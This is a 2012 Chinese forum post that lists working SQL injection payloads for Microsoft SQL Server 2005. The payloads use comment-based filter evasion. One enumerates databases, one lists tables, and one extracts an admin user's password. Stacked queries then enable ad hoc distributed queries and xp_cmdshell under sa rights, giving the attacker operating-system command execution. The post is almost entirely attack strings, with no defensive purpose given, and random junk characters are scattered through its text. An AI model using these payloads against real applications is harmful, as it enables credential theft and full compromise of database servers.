找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2546|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

) H! S" u$ C3 L# o2 a4 D7 |3 D* _4 p. o1 t

; m- E; h5 d, @0 b0 Q8 o% d[Copy to clipboard]CODE:
2 j* l; ^( H+ _/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--( c% o6 `' C3 w- a  f
' b0 |* E3 X; c1 e2 A
爆表语句,somedb部份是所要列的数据库,红色数字1累加
* c, x2 G% R5 D( F1 d: |( ~
3 [+ X0 D" z2 K2 J3 z
' P' |; Z1 j& ?0 `2 a; l- h[Copy to clipboard]CODE:$ ~$ T4 B' r4 d7 s; N/ ?" ?
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
: `' T; o9 ~5 l0 q) @) \% b, l- O: N8 e9 b5 [  `6 a
爆字段语句,爆表admin里user='icerover'的密码段2 o1 j" h, i7 {2 r9 Y5 ]( M
) |" P. P6 l+ Y3 Z) y. n* U' s

4 _. I) o) y7 a' d! @[Copy to clipboard]CODE:- |/ o) k* |  D7 d) L% C
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--) E3 U- y2 ?$ u4 _1 H
+ x. Y3 F9 Q, C6 A0 m. z9 M
mssql2005默认没有开xp_cmdshell的,openrowset也不能用
! x* s9 C9 B7 t# i) j% Y0 N如果是sa权限,可以这样来开启% g( h  Z! O8 p1 o
开启openrowset9 g9 N" M; ^# y6 G& [& I

' \! o! z/ h  o: e4 M# L+ R: F  [* R% p+ A2 C' P- b0 |/ t
[Copy to clipboard]CODE:5 \- z7 y$ V$ `' U1 Y( w# }+ T# \
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
' N* R* j+ h7 P7 @; w$ }/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--& y! G# i$ ^1 \; V; |9 r  y0 _

  z5 \7 W5 C0 P3 G. Q开启xp_cmdshell
0 v8 z: a' G7 z5 R' v, \- d
! h9 `; _3 ^5 j! y& x' D6 |  ^0 i2 C) q: v
[Copy to clipboard]CODE:
4 I2 ^2 a* k+ I+ c9 oEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--6 h: c2 M# R! b' }; O/ B
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--& l5 L9 z1 R# ?& r% m# C0 Y
1 A3 k6 t" T, a; h* _* i( C- a
ok,over~~晚安
: `$ ^& j$ L* N6 D9 b- m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表